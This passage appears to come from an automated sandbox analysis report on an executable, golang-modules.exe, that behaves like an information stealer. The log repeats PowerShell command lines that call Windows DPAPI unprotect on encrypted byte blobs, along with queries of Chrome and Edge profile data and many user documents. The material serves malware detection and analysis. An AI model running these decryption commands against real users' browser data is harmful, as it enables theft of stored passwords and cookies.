Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:listJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'currentuser')
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'currentuser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')
Source: conhost.exe, 00000002.00000002.110238453579.00000167710E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000002.00000002.110238453579.00000167710E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000002.00000002.110238453579.00000167710E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Managerw
Source: conhost.exe, 00000002.00000002.110238453579.00000167710E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\golang-modules.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\temp.ps1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\DQOFHVHTMG VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\AQRFEVRTGL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\TQDFJHPUIU.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\GRXZDKKVDB.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\NWCXBPIUYI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BJZFPPWAPT.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EWZCVGNOWT.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AUWNZUKQIE.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BJZFPPWAPT.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BJZFPPWAPT.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CZQKSDDMWR.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CZQKSDDMWR.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EOWRVPQCCS.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EWZCVGNOWT.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GJBHWQDROJ.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HDYJUYEQXK.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HHWFPWGUPQ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MNKQCGFJDG.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWCXBPIUYI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SBVUSFKOGN.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UCKFKZQOSO.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\DQOFHVHTMG VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\UNKRLCVOHV.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\AQRFEVRTGL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\TQDFJHPUIU.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\CZQKSDDMWR.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UCKFKZQOSO.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZYXFLCGPAD.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZYXFLCGPAD.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ VolumeInformationJump to behavior
